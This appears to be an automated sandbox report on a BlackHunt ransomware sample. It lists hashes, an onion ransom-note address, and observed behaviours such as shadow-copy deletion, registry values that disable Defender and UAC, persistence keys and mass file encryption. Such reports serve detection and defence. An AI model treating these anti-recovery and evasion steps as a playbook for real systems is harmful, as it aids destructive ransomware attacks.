Analysis
-
max time kernel
169s -
max time network
183s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
18-01-2024 22:35
Static task
static1
Behavioral task
behavioral1
Sample
15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe
Resource
win10v2004-20231215-en
General
-
Target
15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe
-
Size
707KB
-
MD5
0fc015a616d55212c820288cd29e22ed
-
SHA1
cbb4afaf68028f69c529b6ccbeda8f230180bb09
-
SHA256
15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa
-
SHA512
48dc15f303fba45a9c419ea2df72f329dda4ad451d2902500b474c44f62a8d6f5644de566dc8cea2e89de5619dacc8dd4b033416783feb583e8fc028641264a6
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1G8lvnh:6uaTmkZJ+naie5OTamgEoKxLWdBh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 4108 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 3484 bcdedit.exe 3172 bcdedit.exe -
Renames multiple (1300) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 696 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\O: 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened (read-only) \??\K: 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened (read-only) \??\L: 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened (read-only) \??\M: 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened (read-only) \??\I: 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened (read-only) \??\P: 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened (read-only) \??\B: 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened (read-only) \??\H: 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened (read-only) \??\J: 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened (read-only) \??\Y: 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened (read-only) \??\U: 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened (read-only) \??\T: 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened (read-only) \??\A: 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened (read-only) \??\X: 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened (read-only) \??\Q: 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened (read-only) \??\G: 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened (read-only) \??\N: 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened (read-only) \??\S: 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened (read-only) \??\Z: 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened (read-only) \??\V: 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened (read-only) \??\E: 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\W: 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened (read-only) \??\R: 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 23 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\7-Zip\Lang\ms.txt 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened for modification C:\Program Files\7-Zip\Lang\nb.txt 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\pkcs11cryptotoken.md 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\MakeAccessible.api 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fr-fr\#BlackHunt_Private.key 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_gridview_selected-hover.svg 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_hover_18.svg 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\#BlackHunt_ReadMe.hta 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened for modification C:\Program Files\7-Zip\Lang\de.txt 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\#BlackHunt_Private.key 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File created C:\Program Files\VideoLAN\VLC\locale\gd\#BlackHunt_ReadMe.hta 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\review_same_reviewers.gif 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filter-dark-focus_32.svg 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\virgo-new-folder.svg 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app-api\dev\app-api.js 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File created C:\Program Files\VideoLAN\VLC\lua\http\#BlackHunt_Private.key 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\#BlackHunt_ReadMe.txt 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File created C:\Program Files\VideoLAN\VLC\plugins\audio_mixer\#BlackHunt_ReadMe.txt 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened for modification C:\Program Files\VideoLAN\VLC\uninstall.log 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\#BlackHunt_Private.key 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\images\cursors\win32_CopyDrop32x32.gif 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\jquery-ui-1.8.13.custom.css 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\core\dev\#BlackHunt_Private.key 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\limited\local_policy.jar 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\splash_11-lic.gif 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File created C:\Program Files\Java\jre-1.8\lib\security\policy\unlimited\#BlackHunt_ReadMe.txt 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_reportabuse-default_18.svg 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened for modification C:\Program Files\7-Zip\Lang\fa.txt 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\#BlackHunt_ReadMe.hta 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File created C:\Program Files\VideoLAN\VLC\locale\da\#BlackHunt_ReadMe.txt 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File created C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\#BlackHunt_ReadMe.txt 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File created C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\#BlackHunt_ReadMe.hta 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Home.aapp 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_organize_18.svg 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File created C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\#BlackHunt_Private.key 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File created C:\Program Files\VideoLAN\VLC\plugins\video_output\#BlackHunt_Private.key 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\#BlackHunt_ReadMe.txt 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\es-es\#BlackHunt_Private.key 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened for modification C:\Program Files\Java\jre-1.8\COPYRIGHT 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File created C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\#BlackHunt_ReadMe.hta 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\buttons.png 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\#BlackHunt_ReadMe.hta 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\#BlackHunt_ReadMe.txt 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\#BlackHunt_ReadMe.hta 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File created C:\Program Files\VideoLAN\VLC\plugins\video_splitter\#BlackHunt_ReadMe.hta 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\#BlackHunt_ReadMe.txt 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File created C:\Program Files\dotnet\host\fxr\6.0.25\#BlackHunt_ReadMe.txt 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File created C:\Program Files\VideoLAN\VLC\locale\cgg\#BlackHunt_ReadMe.txt 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\#BlackHunt_ReadMe.txt 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File created C:\Program Files\VideoLAN\VLC\locale\hi\#BlackHunt_Private.key 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File created C:\Program Files\VideoLAN\VLC\plugins\#BlackHunt_Private.key 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\app\dev\#BlackHunt_ReadMe.hta 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened for modification C:\Program Files\7-Zip\Lang\lij.txt 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\ccloud.png 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\uk-ua\#BlackHunt_Private.key 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_newfolder-default.svg 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File created C:\Program Files\Java\jdk-1.8\#BlackHunt_Private.key 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\classfile_constants.h 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\cmm\CIEXYZ.pf 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened for modification C:\Program Files\SendApprove.mht 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\info.gif 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened for modification C:\Program Files\7-Zip\Lang\ru.txt 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\[email protected] 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgePackages.h 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4452 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 4892 vssadmin.exe 2576 vssadmin.exe 1192 vssadmin.exe 2196 vssadmin.exe 2316 vssadmin.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe Token: SeRestorePrivilege 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe Token: SeBackupPrivilege 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe Token: SeTakeOwnershipPrivilege 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe Token: SeAuditPrivilege 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe Token: SeSecurityPrivilege 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe Token: SeIncBasePriorityPrivilege 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe Token: SeBackupPrivilege 2064 vssvc.exe Token: SeRestorePrivilege 2064 vssvc.exe Token: SeAuditPrivilege 2064 vssvc.exe Token: SeBackupPrivilege 1160 wbengine.exe Token: SeRestorePrivilege 1160 wbengine.exe Token: SeSecurityPrivilege 1160 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2740 wrote to memory of 1332 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 92 PID 2740 wrote to memory of 1332 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 92 PID 2740 wrote to memory of 1860 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 94 PID 2740 wrote to memory of 1860 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 94 PID 2740 wrote to memory of 4116 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 96 PID 2740 wrote to memory of 4116 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 96 PID 2740 wrote to memory of 3284 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 98 PID 2740 wrote to memory of 3284 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 98 PID 2740 wrote to memory of 4816 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 100 PID 2740 wrote to memory of 4816 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 100 PID 2740 wrote to memory of 2376 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 104 PID 2740 wrote to memory of 2376 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 104 PID 2740 wrote to memory of 3504 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 106 PID 2740 wrote to memory of 3504 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 106 PID 2740 wrote to memory of 3060 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 108 PID 2740 wrote to memory of 3060 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 108 PID 2740 wrote to memory of 700 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 111 PID 2740 wrote to memory of 700 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 111 PID 2740 wrote to memory of 4512 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 110 PID 2740 wrote to memory of 4512 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 110 PID 2740 wrote to memory of 3680 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 114 PID 2740 wrote to memory of 3680 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 114 PID 2740 wrote to memory of 3756 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 115 PID 2740 wrote to memory of 3756 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 115 PID 2740 wrote to memory of 4520 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 118 PID 2740 wrote to memory of 4520 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 118 PID 2740 wrote to memory of 1996 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 120 PID 2740 wrote to memory of 1996 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 120 PID 2740 wrote to memory of 2736 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 121 PID 2740 wrote to memory of 2736 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 121 PID 2740 wrote to memory of 5008 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 124 PID 2740 wrote to memory of 5008 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 124 PID 2740 wrote to memory of 4412 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 127 PID 2740 wrote to memory of 4412 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 127 PID 2740 wrote to memory of 4964 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 134 PID 2740 wrote to memory of 4964 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 134 PID 2740 wrote to memory of 5060 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 132 PID 2740 wrote to memory of 5060 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 132 PID 2740 wrote to memory of 3836 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 136 PID 2740 wrote to memory of 3836 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 136 PID 2740 wrote to memory of 4476 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 137 PID 2740 wrote to memory of 4476 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 137 PID 1332 wrote to memory of 2560 1332 cmd.exe 102 PID 1332 wrote to memory of 2560 1332 cmd.exe 102 PID 4116 wrote to memory of 2532 4116 cmd.exe 133 PID 4116 wrote to memory of 2532 4116 cmd.exe 133 PID 1860 wrote to memory of 2420 1860 cmd.exe 180 PID 1860 wrote to memory of 2420 1860 cmd.exe 180 PID 4816 wrote to memory of 3840 4816 cmd.exe 129 PID 4816 wrote to memory of 3840 4816 cmd.exe 129 PID 3284 wrote to memory of 3204 3284 cmd.exe 130 PID 3284 wrote to memory of 3204 3284 cmd.exe 130 PID 2376 wrote to memory of 4840 2376 cmd.exe 142 PID 2376 wrote to memory of 4840 2376 cmd.exe 142 PID 2740 wrote to memory of 4780 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 140 PID 2740 wrote to memory of 4780 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 140 PID 2740 wrote to memory of 1192 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 209 PID 2740 wrote to memory of 1192 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 209 PID 2740 wrote to memory of 2052 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 143 PID 2740 wrote to memory of 2052 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 143 PID 3504 wrote to memory of 4240 3504 cmd.exe 150 PID 3504 wrote to memory of 4240 3504 cmd.exe 150 PID 2740 wrote to memory of 4528 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 146 PID 2740 wrote to memory of 4528 2740 15af4b5cdac4ff4034f321d4488938240e22feff43bf0e8c62c30c27c481bbfa.exe 146 -
System policy modification 1 TTPs 3 IoCs
